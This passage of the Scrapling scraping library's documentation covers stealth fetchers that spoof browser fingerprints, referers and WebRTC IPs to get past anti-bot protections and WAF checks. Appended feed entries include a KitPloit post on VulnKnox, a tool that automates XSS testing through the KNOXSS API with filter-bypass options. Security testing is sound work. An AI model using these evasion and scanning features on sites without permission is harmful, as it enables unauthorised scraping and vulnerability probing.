This class is built on top of Camoufox, which bypasses most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations on top to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests made by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

For the sake of simplicity, here is the complete list of arguments:

| Argument | Description | Optional |
|:---:|---|:---:|
| url | Target url | ❌ |
| headless | Pass `True` to run the browser in headless/hidden (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | ✔️ |
| block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ |
| disable_resources | Drop requests of unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests on some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ |
| google_search | Enabled by default; Scrapling will set the referer header as if this request came from a Google search for this website's domain name. | ✔️ |
| extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | ✔️ |
| block_webrtc | Blocks WebRTC entirely. | ✔️ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | ✔️ |
| addons | List of Firefox addons to use. **Must be paths to extracted addons.** | ✔️ |
| humanize | Humanize the cursor movement. Takes either `True` or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | ✔️ |
| allow_webgl | Enabled by default. Disabling WebGL is not recommended, as many WAFs now check whether WebGL is enabled. | ✔️ |
| geoip | Recommended to use with proxies; automatically uses the IP's longitude, latitude, timezone, country, and locale, and spoofs the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | ✔️ |
| disable_ads | Disabled by default; this installs the `uBlock Origin` addon on the browser if enabled. | ✔️ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | ✔️ |
| timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | ✔️ |
| wait_selector | Wait for a specific CSS selector to be in a specific state. | ✔️ |
| proxy | The proxy to be used with requests; it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | ✔️ |
| os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is for Scrapling to match the fingerprints to the current OS. | ✔️ |
| wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | ✔️ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
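In the meantime, here's a hedged sketch combining several of the arguments above (values are illustrative, not recommendations):

page = StealthyFetcher().fetch(
    'https://example.com',
    headless=True,             # the default; pass 'virtual' if you have xvfb installed
    block_images=True,         # saves bandwidth/proxy usage; some sites may never finish loading
    google_search=True,        # the default; referer looks like a Google search for the domain
    geoip=True,                # recommended with proxies: spoofs location-dependent fingerprints
    proxy='http://username:password@localhost:8030',
    network_idle=True,         # wait until no network connections for at least 500 ms
    wait_selector='.content',  # wait for this CSS selector before returning
    timeout=30000,             # milliseconds
)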

PlayWrightFetcher

This class is built on top of Playwright and currently provides 4 main run options, which can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests made by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

Using this Fetcher class, you can make requests with:

  1. Vanilla Playwright, without any modifications other than the ones you chose.
  2. Stealthy Playwright, with the stealth mode I wrote for it. It's still a WIP, but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include:
    • Patching the CDP runtime fingerprint.
    • Mimicking some real browsers' properties by injecting several JS files and using custom options.
    • Using custom flags on launch to hide Playwright even more and make it faster.
    • Generating real browser headers of the same type and same user OS, then appending them to the request's headers.
  3. Real browsers, by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher; most of the options can be enabled on it.
  4. NSTBrowser's docker browserless option, by passing the CDP URL and enabling the nstbrowser_mode option.

Note: using the real_chrome argument requires that you have the Chrome browser installed on your device.
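Here's a hedged sketch of those four options side by side; the argument names come from the table below, and the CDP URL is a placeholder:

# 1) Vanilla Playwright
page = PlayWrightFetcher().fetch('https://example.com')
# 2) Stealthy Playwright
page = PlayWrightFetcher().fetch('https://example.com', stealth=True)
# 3) Your real, installed Chrome browser
page = PlayWrightFetcher().fetch('https://example.com', real_chrome=True)
# 4) NSTBrowser's docker browserless over CDP (URL is a placeholder)
page = PlayWrightFetcher().fetch('https://example.com', cdp_url='ws://localhost:8848', nstbrowser_mode=True)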

Add to that a lot of controlling/hiding options, as you will see in the arguments list below.

The complete list of arguments:

| Argument | Description | Optional |
|:---:|---|:---:|
| url | Target url | ❌ |
| headless | Pass `True` to run the browser in headless/hidden (**default**), or `False` for headful/visible mode. | ✔️ |
| disable_resources | Drop requests of unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests on some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage but be careful with this option as it makes some websites never finish loading._ | ✔️ |
| useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate and use a real useragent of the same browser.** | ✔️ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | ✔️ |
| timeout | The timeout in milliseconds that is used in all operations and waits through the page. The default is 30000. | ✔️ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | ✔️ |
| wait_selector | Wait for a specific CSS selector to be in a specific state. | ✔️ |
| wait_selector_state | The state to wait for the selector given with `wait_selector`. _Default state is `attached`._ | ✔️ |
| google_search | Enabled by default; Scrapling will set the referer header as if this request came from a Google search for this website's domain name. | ✔️ |
| extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | ✔️ |
| proxy | The proxy to be used with requests; it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | ✔️ |
| hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | ✔️ |
| disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | ✔️ |
| stealth | Enables stealth mode; always check the documentation to see what stealth mode currently does. | ✔️ |
| real_chrome | If you have the Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | ✔️ |
| locale | Set the locale for the browser if wanted. The default value is `en-US`. | ✔️ |
| cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | ✔️ |
| nstbrowser_mode | Enables NSTBrowser mode; **it has to be used with the `cdp_url` argument or it will be completely ignored.** | ✔️ |
| nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser docker browserless config._ | ✔️ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element, like below:

for ancestor in quote.iterancestors():
    # do something with it...

You can search for a specific ancestor of an element that satisfies a function; all you need to do is pass a function that takes an Adaptor object as an argument and returns True if the condition is satisfied or False otherwise, like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways. Here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'£[\d\.]+') # Get the first element whose text content matches my price regex
<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'£[\d\.]+', first_match=False) # Get all elements whose text content matches my price regex
[<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
...     print({
...         "name": product.css_first('h3 a::text'),
...         "price": product.css_first('.price_color').re_first(r'[\d\.]+'),
...         "stock": product.css('.availability::text')[-1].clean()
...     })
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You would probably write a selector like this:

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1', auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this, we need to find a website that will change its design/structure soon, take a copy of its source, and then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner, but that would make it a staged test haha.

To solve this issue, I will use the Web Archive's Wayback Machine. Here is a copy of StackOverflow's website from 2010, pretty old, huh? Let's test whether the auto-match feature can extract the same button from the old 2010 design and the current design using the same selector :)

If I want to extract the Questions button from the old design, I can use a selector like this: #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a. This selector is too specific because it was generated by Google Chrome. Now let's test the same selector on both versions.

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain. This is because, to Scrapling, these are two different URLs, not the same website, so it isolates their auto-match data. To tell Scrapling they are the same website, we pass the domain we want to use for saving auto-match data for both of them, so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same, except it will use the same URL for both requests, so you won't need the automatch_domain argument. This is the closest example I can give to a real-world case, so I hope it didn't confuse you :)

Notes:

  1. For the two examples above, I used the Adaptor class one time and the Fetcher class the other time, just to show that you can create the Adaptor object yourself if you have the source, or fetch the source using any Fetcher class and it will create the Adaptor object for you.
  2. Passing the auto_save argument while the auto_match argument is set to False during initialization of the Adaptor/Fetcher object will result in the auto_save argument being ignored, with the following warning message: Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons, so the database only gets created/connected when you are planning to use the auto-matching features. The same applies to the auto_match argument.

  3. The auto_match parameter works only for Adaptor instances, not Adaptors (the class returned for lists of elements). So if you do something like page.css('body').css('#p1', auto_match=True) you will get an error, because you can't auto-match a whole list; you have to be specific and do something like page.css_first('body').css('#p1', auto_match=True).

Find elements by filters

Inspired by BeautifulSoup's find_all function, you can find elements by using the find_all/find methods. Both methods can take multiple types of filters and return all elements in the page that all these filters apply to.

To be more specific:

  • Any string passed is considered a tag name.
  • Any iterable passed (List/Tuple/Set) is considered an iterable of tag names.
  • Any dictionary passed is considered a mapping of HTML element attribute names to attribute values.
  • Any regex patterns passed are used as filters on elements by their text content.
  • Any functions passed are used as filters.
  • Any keyword argument passed is considered an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements whose text content matches all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above. So if no tag name(s) are passed but attributes are, the process starts from that layer, and so on. The order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in their content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex (note: requires `import re`)
>> import re
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object of any element directly:

    >>> quote._root
    <Element div at 0x107f98870>

  • Saving and retrieving elements manually to auto-match them outside the css and xpath methods, but you have to set the identifier yourself.

    To save an element to the database:

    >>> element = page.find_by_text('Tipping the Velvet', first_match=True)
    >>> page.save(element, 'my_special_element')

    Later, when you want to retrieve it and relocate it inside the page with auto-matching, it goes like this:

    >>> element_dict = page.retrieve('my_special_element')
    >>> page.relocate(element_dict, adaptor_type=True)
    [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
    >>> page.relocate(element_dict, adaptor_type=True).css('::text')
    ['Tipping the Velvet']

    If you want to keep it as an lxml.etree object, leave out the adaptor_type argument:

    >>> page.relocate(element_dict)
    [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function:

    # Find all products over $50
    expensive_products = page.css('.product_pod').filter(
        lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
    )

  • Searching results for the first one that matches a function:

    # Find the first product with price '54.23'
    page.css('.product_pod').search(
        lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
    )
  • Doing operations on element content is the same as in Scrapy:

    quote.re(r'regex_pattern')        # Get all strings (TextHandlers) that match the regex pattern
    quote.re_first(r'regex_pattern')  # Get the first string (TextHandler) only
    quote.json()                      # If the content text is JSON-parsable, convert it to JSON using `orjson`, which is ~10x faster than the standard json library and provides more options

    except that you can do more with them, like:

    quote.re(
        r'regex_pattern',
        replace_entities=True,  # Character entity references are replaced by their corresponding character
        clean_match=True,       # Ignore all whitespaces and consecutive spaces while matching
        case_sensitive=False,   # Set the regex to ignore letter case while compiling it
    )

    Note: all of these are methods of the TextHandler that holds the text content, so the same can be done directly if you call the .text property or an equivalent selector function.

  • Doing operations on the text content itself includes:

  • Cleaning the text of any whitespace and replacing consecutive spaces with a single space:

    quote.clean()

  • You already know about regex matching and fast JSON parsing, but did you know that all strings returned from a regex search are actually TextHandler objects too? So in cases where you have, for example, a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to a JSON object, this would take more than one line of code in other libraries, but here it's one line:

    page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()

  • Sorting all characters in the string as if it were a list and returning the new string:

    quote.sort(reverse=False)

    To be clear, TextHandler is a subclass of Python's str, so all normal operations/methods that work with Python strings will work with it.
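    A quick illustration of that (the selector is just an example from the books site used earlier):

    price = page.css_first('.price_color::text')  # a TextHandler
    price.upper()                # plain str methods work as usual
    price.re_first(r'[\d\.]+')   # plus the extra regex helpers shown above
    price.clean()                # whitespace cleaning
    price.json()                 # JSON parsing, if the text is valid JSON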

  • An element's attributes are not exactly a dictionary but a read-only subclass of Mapping called AttributesHandler, which makes it faster. The string values it returns are actually TextHandler objects, so all of the operations above can be done on them, plus standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can also search by values and do partial searches. It might be handy in some cases (returns a generator of matches):

    >>> for item in element.attrib.search_values('catalogue', partial=True):
    ...     print(item)
    {'href': 'catalogue/tipping-the-velvet_999/index.html'}

  • Serializing the current attributes to JSON bytes:

    >>> element.attrib.json_string
    b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'

  • Converting it to a normal dictionary:

    >>> dict(element.attrib)
    {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to make this as short as possible, so to take a deep dive, head to the docs section. I will try to keep it as up to date as possible and add complex examples. There, I will explain points like how to write your own storage system, how to write spiders that don't depend on selectors at all, and more...

Note that implementing your own storage system can be complex, as there are some strict rules, such as inheriting from the same abstract class, following the singleton design pattern used in the other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A dedicated website with detailed library documentation is still needed.
I'm trying to hurry up and create the website, research new ideas, and add more features/tests/benchmarks, but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free, after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚡ Enlightening Questions and FAQs

This section addresses common questions about Scrapling; please read it before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with the css or xpath methods, with the auto_save parameter set to True, before the structural changes happen.
  2. Before returning results to you, Scrapling uses its configured database to save unique properties about that element.
  3. Because everything about the element can be changed or removed, nothing from the element itself can be used as a unique identifier in the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object.
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself is used as the identifier, but remember that you will have to use it as the identifier value later, when the structure changes and you want to pass the new selector.

    Together, both are used to retrieve the element's unique properties from the database later.

  4. Later, when you enable the auto_match parameter for both the Adaptor instance and the method call, the element's properties are retrieved, Scrapling loops over all elements in the page, and each one's unique properties are compared to the unique properties we already have for this element, with a score calculated for each.
  5. Comparing elements is not exact; it's more about finding how similar the values are, so everything is taken into consideration, even the order of values, like the order in which the element's class names were written before and the order in which the same class names are written now.
  6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.
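Putting those steps together, here is a hedged sketch of the flow with an explicit identifier (old_source and new_source are placeholders for page sources captured before and after a site change):

from scrapling.parser import Adaptor

# Run once before the site changes: select normally and save the element's unique properties
page = Adaptor(old_source, url='https://example.com')
page.css_first('#p1', auto_save=True, identifier='first-product')

# Run later, after the structural change: relocate the element by the same identifier
page = Adaptor(new_source, url='https://example.com')
element = page.css_first('#p1', auto_match=True, identifier='first-product')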

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem, as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you later use the same identifier for a different website that you also didn't pass the URL parameter for while initializing. The save process will overwrite the previous data, and auto-matching uses only the latest saved properties.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract:

  • The element's tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only).
  • The element's parent's tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object results in the argument being ignored. This behavior is purely for performance reasons, so the database only gets created when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons:

  1. No data was saved/stored for this element before.
  2. The selector passed is not the one used while storing the element's data. The solution is simple:
    • Pass the old selector again as an identifier to the method called, or
    • Retrieve the element with the retrieve method, using the old selector as the identifier, then save it again with the save method and the new selector as the identifier, and
    • Start using the identifier argument more often if you are planning to use every new selector from now on.
  3. The website had some extreme structural changes, like a full redesign. If this happens a lot with this website, the solution is to make your code as selector-free as possible, using Scrapling's features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much, yeah. Almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course. You can find elements by text/regex, find similar elements more reliably than AutoScraper, and save/retrieve elements manually to use later, like the model feature in AutoScraper. I pulled all the top articles about AutoScraper from Google and tested Scrapling against their examples. In all of them, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its own state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under the BSD-3-Clause license.

Acknowledgments

This project includes code adapted from:

  • Parsel (BSD License), used for the translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, only the unique properties of the first element from the selection results are saved. So if the selector you are using matches different elements on the page in different locations, auto-matching will probably return only that first element when you relocate it later. This doesn't apply to combined CSS selectors (using commas to combine more than one selector, for example), as those selectors get separated and each one is executed alone.

Designed & crafted with ❤️ by Karim Shoair.



☐ ☆ ✇ Security – Cisco Blog

Cisco XDR Just Changed the Game, Again

By: AJ Shipley — April 28th 2025 at 11:55
Clear verdict. Decisive action. AI speed. Cisco XDR turns noise into clarity and alerts into action—enabling confident, timely response at scale.
☐ ☆ ✇ KitPloit - PenTest Tools!

VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing

By: Unknown — April 27th 2025 at 12:30


VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.


Features

  • Supports pipe input for passing file lists and echoing URLs for testing
  • Configurable retries and timeouts
  • Supports GET, POST, and BOTH HTTP methods
  • Advanced Filter Bypass (AFB) feature
  • Flash Mode for quick XSS polyglot testing
  • CheckPoC feature to verify the proof of concept
  • Concurrent processing with configurable parallelism
  • Custom headers support for authenticated requests
  • Proxy support
  • Discord webhook integration for notifications
  • Detailed output with color-coded results

Installation

go install github.com/iqzer0/vulnknox@latest

Configuration

Before using the tool, you need to set up your configuration:

API Key

Obtain your KNOXSS API key from knoxss.me.

On the first run, a default configuration file will be created at:

Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.

Discord Webhook (Optional)

If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.

Usage

Usage of vulnknox:

-u          Input URL to send to KNOXSS API
-i          Input file containing URLs to send to KNOXSS API
-X          HTTP method to use: GET, POST, or BOTH (default: GET)
-pd         POST data in format 'param1=value&param2=value'
-headers    Custom headers in format 'Header1:value1,Header2:value2'
-afb        Use Advanced Filter Bypass
-checkpoc   Enable CheckPoC feature
-flash      Enable Flash Mode
-o          The file to save the results to
-ow         Overwrite output file if it exists
-oa         Output all results to file, not just successful ones
-s          Only show successful XSS payloads in output
-p          Number of parallel processes, 1-5 (default: 3)
-t          Timeout for API requests in seconds (default: 600)
-dw         Discord Webhook URL (overrides config file)
-r          Number of retries for failed requests (default: 3)
-ri         Interval between retries in seconds (default: 30)
-sb         Skip domains after this many 403 responses (default: 0)
-proxy      Proxy URL (e.g., http://127.0.0.1:8080)
-v          Verbose output
-version    Show version number
-no-banner  Suppress the banner
-api-key    KNOXSS API Key (overrides config file)

Basic Examples

Test a single URL using GET method:

vulnknox -u "https://example.com/page?param=value"

Test a URL with POST data:

vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"

Enable Advanced Filter Bypass and Flash Mode:

vulnknox -u "https://example.com/page?param=value" -afb -flash

Use custom headers (e.g., for authentication):

vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"

Process URLs from a file with 5 concurrent processes:

vulnknox -i urls.txt -p 5
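Pipe input is also supported (as listed in the features); assuming URLs are read from stdin when neither -u nor -i is given, something like this should work:

cat urls.txt | vulnknox -p 5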

